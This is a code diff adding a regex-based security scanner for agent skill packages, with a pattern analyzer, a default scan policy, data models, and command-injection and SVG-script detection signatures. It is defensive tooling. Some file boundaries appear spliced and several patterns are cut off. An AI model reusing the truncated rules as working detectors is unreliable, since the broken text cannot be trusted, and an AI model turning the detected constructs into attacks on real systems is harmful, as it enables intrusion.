skill name for richer finding messages. + + Returns + ------- + list[Finding] + Findings discovered by this analyzer. + """ + + # ------------------------------------------------------------------ + # Helpers + # ------------------------------------------------------------------ + + def get_name(self) -> str: # noqa: D401 + """Analyzer name.""" + return self.name diff --git a/src/copaw/security/skill_scanner/analyzers/pattern_analyzer.py b/src/copaw/security/skill_scanner/analyzers/pattern_analyzer.py new file mode 100644 index 000000000..8df88af54 --- /dev/null +++ b/src/copaw/security/skill_scanner/analyzers/pattern_analyzer.py @@ -0,0 +1,392 @@ +# -*- coding: utf-8 -*- +"""YAML-signature pattern matching analyzer. + +Loads security rules from YAML files (see ``rules/signatures/``) and +performs fast, line-based regex matching with a multiline fallback for +patterns that intentionally span newlines. +""" +from __future__ import annotations + +import logging +import re +from pathlib import Path +from typing import Any + +import yaml + +from ..models import Finding, Severity, SkillFile, ThreatCategory +from ..scan_policy import ScanPolicy +from . import BaseAnalyzer + +logger = logging.getLogger(__name__) + +# Matches character-class contents so we can tell whether ``\n`` in a +# pattern is genuinely multiline vs. ``[^\n]``. +_CHAR_CLASS_RE = re.compile(r"\[[^\]]*\]") + +# Default signatures directory (shipped with the package). +_DEFAULT_SIGNATURES_DIR = ( + Path(__file__).resolve().parent.parent / "rules" / "signatures" +) + + +# --------------------------------------------------------------------------- +# SecurityRule – one YAML rule entry +# --------------------------------------------------------------------------- + + +class SecurityRule: + """A single regex-based security detection rule.""" + + __slots__ = ( + "id", + "category", + "severity", + "patterns", + "exclude_patterns", + "file_types", + "description", + "remediation", + "compiled_patterns", + "compiled_exclude_patterns", + ) + + def __init__(self, rule_data: dict[str, Any]) -> None: + self.id: str = rule_data["id"] + self.category = ThreatCategory(rule_data["category"]) + self.severity = Severity(rule_data["severity"]) + self.patterns: list[str] = rule_data["patterns"] + self.exclude_patterns: list[str] = rule_data.get( + "exclude_patterns", + [], + ) + self.file_types: list[str] = rule_data.get("file_types", []) + self.description: str = rule_data["description"] + self.remediation: str = rule_data.get("remediation", "") + + self.compiled_patterns: list[re.Pattern[str]] = [] + for pat in self.patterns: + try: + self.compiled_patterns.append(re.compile(pat)) + except re.error as exc: + logger.warning("Bad regex in rule %s: %s", self.id, exc) + + self.compiled_exclude_patterns: list[re.Pattern[str]] = [] + for pat in self.exclude_patterns: + try: + self.compiled_exclude_patterns.append(re.compile(pat)) + except re.error as exc: + logger.warning( + "Bad exclude regex in rule %s: %s", + self.id, + exc, + ) + + # ------------------------------------------------------------------ + + def matches_file_type(self, file_type: str) -> bool: + """Return *True* if this rule applies to *file_type*.""" + if not self.file_types: + return True + return file_type in self.file_types + + def scan_content( + self, + content: str, + file_path: str | None = None, + ) -> list[dict[str, Any]]: + """Scan *content* for rule violations. + + Returns a list of match dicts with ``line_number``, ``line_content``, + ``matched_pattern``, ``matched_text``, and ``file_path``. + """ + matches: list[dict[str, Any]] = [] + lines = content.split("\n") + + # --- Pass 1: line-based matching (fast) -------------------------- + for line_num, line in enumerate(lines, start=1): + excluded = any( + ep.search(line) for ep in self.compiled_exclude_patterns + ) + if excluded: + continue + for pattern in self.compiled_patterns: + m = pattern.search(line) + if m: + matches.append( + { + "line_number": line_num, + "line_content": line.strip(), + "matched_pattern": pattern.pattern, + "matched_text": m.group(0), + "file_path": file_path, + }, + ) + + # --- Pass 2: multiline patterns ---------------------------------- + for pattern in self.compiled_patterns: + stripped = _CHAR_CLASS_RE.sub("", pattern.pattern) + if "\\n" not in stripped: + continue + for m in pattern.finditer(content): + matched_text = m.group(0) + excluded = any( + ep.search(matched_text) + for ep in self.compiled_exclude_patterns + ) + if excluded: + continue + start_line = content.count("\n", 0, m.start()) + 1 + snippet = ( + lines[start_line - 1].strip() + if 0 <= start_line - 1 < len(lines) + else "" + ) + matches.append( + { + "line_number": start_line, + "line_content": snippet, + "matched_pattern": pattern.pattern, + "matched_text": matched_text[:200], + "file_path": file_path, + }, + ) + + return matches + + +# --------------------------------------------------------------------------- +# RuleLoader +# --------------------------------------------------------------------------- + + +class RuleLoader: + """Loads :class:`SecurityRule` objects from YAML files.""" + + def __init__(self, rules_path: Path | None = None) -> None: + self.rules_path = rules_path or _DEFAULT_SIGNATURES_DIR + self.rules: list[SecurityRule] = [] + self.rules_by_id: dict[str, SecurityRule] = {} + self.rules_by_category: dict[ThreatCategory, list[SecurityRule]] = {} + + def load_rules(self) -> list[SecurityRule]: + """Load and index all rules from the configured path.""" + path = Path(self.rules_path) + if path.is_dir(): + raw: list[dict[str, Any]] = [] + for yaml_file in sorted(path.glob("*.yaml")): + try: + with open(yaml_file, encoding="utf-8") as fh: + data = yaml.safe_load(fh) + except Exception as exc: + raise RuntimeError( + f"Failed to load {yaml_file}: {exc}", + ) from exc + if not isinstance(data, list): + raise RuntimeError(f"Expected list in {yaml_file}") + raw.extend(data) + else: + try: + with open(path, encoding="utf-8") as fh: + raw = yaml.safe_load(fh) + except Exception as exc: + raise RuntimeError(f"Failed to load {path}: {exc}") from exc + if not isinstance(raw, list): + raise RuntimeError(f"Expected list in {path}") + + self.rules = [] + self.rules_by_id = {} + self.rules_by_category = {} + + for entry in raw: + try: + rule = SecurityRule(entry) + self.rules.append(rule) + self.rules_by_id[rule.id] = rule + self.rules_by_category.setdefault(rule.category, []).append( + rule, + ) + except Exception as exc: + logger.warning( + "Skipping rule %s: %s", + entry.get("id", "?"), + exc, + ) + + return self.rules + + def get_rule(self, rule_id: str) -> SecurityRule | None: + return self.rules_by_id.get(rule_id) + + def get_rules_for_file_type(self, file_type: str) -> list[SecurityRule]: + return [r for r in self.rules if r.matches_file_type(file_type)] + + def get_rules_for_category( + self, + category: ThreatCategory, + ) -> list[SecurityRule]: + return self.rules_by_category.get(category, []) + + +# --------------------------------------------------------------------------- +# PatternAnalyzer +# --------------------------------------------------------------------------- + + +class PatternAnalyzer(BaseAnalyzer): + """Analyzer that matches YAML regex signatures against skill files. + + Parameters + ---------- + rules_path: + Path to a YAML file or a directory of YAML files. Defaults to + the ``rules/signatures/`` directory shipped with the package. + policy: + Optional :class:`ScanPolicy` for rule disabling, severity + overrides, and doc-path skipping. + """ + + def __init__( + self, + rules_path: Path | None = None, + *, + policy: ScanPolicy | None = None, + ) -> None: + super().__init__(name="pattern", policy=policy) + loader = RuleLoader(rules_path) + self._rules = loader.load_rules() + self._rules_by_file_type: dict[str, list[SecurityRule]] = {} + logger.debug("PatternAnalyzer loaded %d rules", len(self._rules)) + + # ------------------------------------------------------------------ + # BaseAnalyzer interface + # ------------------------------------------------------------------ + + def analyze( + self, + skill_dir: Path, + files: list[SkillFile], + *, + skill_name: str | None = None, + ) -> list[Finding]: + findings: list[Finding] = [] + skip_in_docs = self.policy.rule_scoping.skip_in_docs + + for sf in files: + content = sf.read_content() + if not content: + continue + + is_doc = self.policy.is_doc_path(sf.relative_path) + + applicable = self._get_rules(sf.file_type) + for rule in applicable: + # --- Policy-based rule filtering --- + # Skip disabled rules early + if self.policy.is_rule_disabled(rule.id): + continue + # Skip doc-only exclusions + if is_doc and rule.id in skip_in_docs: + continue + # Code-only rules should not fire on non-code files + if rule.id in self.policy.rule_scoping.code_only: + if sf.file_type not in ( + "python", + "bash", + "javascript", + "typescript", + ): + continue + + matches = rule.scan_content( + content, + file_path=sf.relative_path, + ) + for match in matches: + # Apply severity override if configured + severity = rule.severity + override = self.policy.get_severity_override(rule.id) + if override: + try: + severity = Severity(override) + except ValueError: + pass + + findings.append( + Finding( + id=( + f"{rule.id}:{sf.relative_path}" + f":{match['line_number']}" + ), + rule_id=rule.id, + category=rule.category, + severity=severity, + title=rule.description, + description=rule.description, + file_path=sf.relative_path, + line_number=match["line_number"], + snippet=match["line_content"], + remediation=rule.remediation, + analyzer=self.name, + metadata={ + "matched_pattern": match["matched_pattern"], + "matched_text": match["matched_text"], + }, + ), + ) + + # Filter well-known test credentials + findings = [ + f for f in findings if not self._is_known_test_credential(f) + ] + + # De-duplicate if enabled in policy + if self.policy.rule_scoping.dedupe_duplicate_findings: + findings = self._dedupe_findings(findings) + + return findings + + # ------------------------------------------------------------------ + # Credential filtering + # ------------------------------------------------------------------ + + def _is_known_test_credential(self, finding: Finding) -> bool: + """Suppress findings that match known test/placeholder credentials.""" + if finding.category != ThreatCategory.HARDCODED_SECRETS: + return False + snippet = (finding.snippet or "").lower() + for cred in self.policy.credentials.known_test_values: + if cred.lower() in snippet: + return True + for marker in self.policy.credentials.placeholder_markers: + if marker.lower() in snippet: + return True + return False + + # ------------------------------------------------------------------ + # De-duplication + # ------------------------------------------------------------------ + + @staticmethod + def _dedupe_findings(findings: list[Finding]) -> list[Finding]: + """Remove exact duplicate findings (same rule + file + line).""" + seen: set[str] = set() + unique: list[Finding] = [] + for f in findings: + key = f"{f.rule_id}:{f.file_path}:{f.line_number}" + if key not in seen: + seen.add(key) + unique.append(f) + return unique + + # ------------------------------------------------------------------ + # Internals + # ------------------------------------------------------------------ + + def _get_rules(self, file_type: str) -> list[SecurityRule]: + """Return rules applicable to *file_type* (cached).""" + if file_type not in self._rules_by_file_type: + self._rules_by_file_type[file_type] = [ + r for r in self._rules if r.matches_file_type(file_type) + ] + return self._rules_by_file_type[file_type] diff --git a/src/copaw/security/skill_scanner/data/default_policy.yaml b/src/copaw/security/skill_scanner/data/default_policy.yaml new file mode 100644 index 000000000..c2b571d10 --- /dev/null +++ b/src/copaw/security/skill_scanner/data/default_policy.yaml @@ -0,0 +1,244 @@ +# CoPaw Skill Scanner – Default Scan Policy +# ============================================ +# This file defines the built-in security policy. Every setting here can be +# overridden in an organisation-specific policy file passed via --policy. +# +# To use a custom policy: +# scanner = SkillScanner(policy=ScanPolicy.from_yaml("my_org_policy.yaml")) + +policy_name: default +policy_version: "1.0" +preset_base: balanced + +# --------------------------------------------------------------------------- +# Hidden files – which dotfiles and dotdirs are considered benign +# --------------------------------------------------------------------------- +hidden_files: + benign_dotfiles: + - ".gitignore" + - ".gitattributes" + - ".gitmodules" + - ".gitkeep" + - ".editorconfig" + - ".prettierrc" + - ".prettierignore" + - ".eslintrc" + - ".eslintignore" + - ".eslintrc.json" + - ".eslintrc.js" + - ".eslintrc.yml" + - ".npmrc" + - ".npmignore" + - ".nvmrc" + - ".node-version" + - ".python-version" + - ".ruby-version" + - ".tool-versions" + - ".flake8" + - ".pylintrc" + - ".isort.cfg" + - ".mypy.ini" + - ".babelrc" + - ".browserslistrc" + - ".dockerignore" + - ".env.example" + - ".env.sample" + - ".env.template" + - ".markdownlint.json" + - ".markdownlintignore" + - ".yamllint" + - ".yamllint.yml" + - ".cursorrules" + - ".cursorignore" + - ".clang-format" + - ".clang-tidy" + - ".mcp.json" + - ".envrc" + - ".version" + + benign_dotdirs: + - ".github" + - ".vscode" + - ".idea" + - ".cursor" + - ".husky" + - ".circleci" + - ".gitlab" + - ".cache" + - ".tmp" + - ".data" + - ".next" + - ".nuxt" + - ".claude" + - ".devcontainer" + - ".vitepress" + - ".docusaurus" + - ".storybook" + +# --------------------------------------------------------------------------- +# Rule scoping – which rules fire where +# --------------------------------------------------------------------------- +rule_scoping: + skip_in_docs: + - "COMMAND_INJECTION_EVAL" + - "COMMAND_INJECTION_OS_SYSTEM" + - "COMMAND_INJECTION_SHELL_TRUE" + - "RESOURCE_ABUSE_INFINITE_LOOP" + + code_only: + - "COMMAND_INJECTION_EVAL" + - "COMMAND_INJECTION_OS_SYSTEM" + - "COMMAND_INJECTION_SHELL_TRUE" + - "RESOURCE_ABUSE_INFINITE_LOOP" + + doc_path_indicators: + - "docs" + - "doc" + - "examples" + - "example" + - "tutorials" + - "tutorial" + - "guides" + - "guide" + - "samples" + - "sample" + - "demo" + - "demos" + - "tests" + - "test" + + doc_filename_patterns: + - "readme" + - "example" + - "tutorial" + - "sample" + - "demo" + - "howto" + - "guide" + + dedupe_duplicate_findings: true + +# --------------------------------------------------------------------------- +# Credentials – known test/placeholder values to auto-suppress +# --------------------------------------------------------------------------- +credentials: + known_test_values: + - "test" + - "test123" + - "password" + - "changeme" + - "example" + - "dummy" + - "placeholder" + - "your-api-key" + - "your_api_key" + - "sk-test" + - "pk-test" + - "xxx" + - "abc123" + - "secret" + - "foobar" + + placeholder_markers: + - "your-" + - "your_" + - "your " + - "example" + - "sample" + - "dummy" + - "placeholder" + - "replace" + - "changeme" + - "change_me" + - " str: + """Read file content if not already loaded.""" + if self.content is None and self.path.exists(): + try: + with open(self.path, encoding="utf-8") as f: + self.content = f.read() + except (OSError, UnicodeDecodeError): + self.content = "" + return self.content or "" + + @property + def is_hidden(self) -> bool: + """Check if file is a dotfile or inside a hidden dir.""" + parts = Path(self.relative_path).parts + return any(part.startswith(".") and part != "." for part in parts) + + # ------------------------------------------------------------------ + # Factory helpers + # ------------------------------------------------------------------ + + @classmethod + def from_path(cls, path: Path, base_dir: Path) -> "SkillFile": + """Create a SkillFile from an on-disk path relative to *base_dir*.""" + rel = str(path.relative_to(base_dir)) + suffix = path.suffix.lower() + file_type = _FILE_TYPE_MAP.get(suffix, "other") + try: + size = path.stat().st_size + except OSError: + size = 0 + return cls( + path=path, + relative_path=rel, + file_type=file_type, + size_bytes=size, + ) + + +# --------------------------------------------------------------------------- +# Finding +# --------------------------------------------------------------------------- + + +@dataclass +class Finding: + """A security issue discovered during a skill scan.""" + + id: str + rule_id: str + category: ThreatCategory + severity: Severity + title: str + description: str + file_path: str | None = None + line_number: int | None = None + snippet: str | None = None + remediation: str | None = None + analyzer: str | None = None + metadata: dict[str, Any] = field(default_factory=dict) + + def to_dict(self) -> dict[str, Any]: + return { + "id": self.id, + "rule_id": self.rule_id, + "category": self.category.value, + "severity": self.severity.value, + "title": self.title, + "description": self.description, + "file_path": self.file_path, + "line_number": self.line_number, + "snippet": self.snippet, + "remediation": self.remediation, + "analyzer": self.analyzer, + "metadata": self.metadata, + } + + +# --------------------------------------------------------------------------- +# Scan result +# --------------------------------------------------------------------------- + + +@dataclass +class ScanResult: + """Aggregated results from scanning a single skill.""" + + skill_name: str + skill_directory: str + findings: list[Finding] = field(default_factory=list) + scan_duration_seconds: float = 0.0 + analyzers_used: list[str] = field(default_factory=list) + analyzers_failed: list[dict[str, str]] = field(default_factory=list) + timestamp: datetime = field( + default_factory=lambda: datetime.now(timezone.utc), + ) + + # ------------------------------------------------------------------ + # Convenience properties + # ------------------------------------------------------------------ + + @property + def is_safe(self) -> bool: + """``True`` when there are no CRITICAL or HIGH findings.""" + return not any( + f.severity in (Severity.CRITICAL, Severity.HIGH) + for f in self.findings + ) + + @property + def max_severity(self) -> Severity: + """Return the highest severity found, or ``SAFE``.""" + if not self.findings: + return Severity.SAFE + order = [ + Severity.CRITICAL, + Severity.HIGH, + Severity.MEDIUM, + Severity.LOW, + Severity.INFO, + ] + for sev in order: + if any(f.severity == sev for f in self.findings): + return sev + return Severity.SAFE + + def get_findings_by_severity(self, severity: Severity) -> list[Finding]: + return [f for f in self.findings if f.severity == severity] + + def get_findings_by_category( + self, + category: ThreatCategory, + ) -> list[Finding]: + return [f for f in self.findings if f.category == category] + + def to_dict(self) -> dict[str, Any]: + result: dict[str, Any] = { + "skill_name": self.skill_name, + "skill_path": self.skill_directory, + "is_safe": self.is_safe, + "max_severity": self.max_severity.value, + "findings_count": len(self.findings), + "findings": [f.to_dict() for f in self.findings], + "scan_duration_seconds": self.scan_duration_seconds, + "analyzers_used": self.analyzers_used, + "timestamp": self.timestamp.isoformat(), + } + if self.analyzers_failed: + result["analyzers_failed"] = self.analyzers_failed + return result diff --git a/src/copaw/security/skill_scanner/rules/signatures/command_injection.yaml b/src/copaw/security/skill_scanner/rules/signatures/command_injection.yaml new file mode 100644 index 000000000..1d41736b0 --- /dev/null +++ b/src/copaw/security/skill_scanner/rules/signatures/command_injection.yaml @@ -0,0 +1,194 @@ +# Command & Code Injection Signatures +# Detects dangerous code execution, shell injection, path traversal, and SQL injection + +- id: COMMAND_INJECTION_EVAL + category: command_injection + severity: CRITICAL + patterns: + - "(?]*>[^<]*" + - "\\bon\\w+\\s*=\\s*[\"'][^\"']*[\"']" + - "javascript\\s*:" + file_types: [other] + description: "SVG file contains embedded script tags or event handlers that can execute JavaScript" + remediation: "Remove all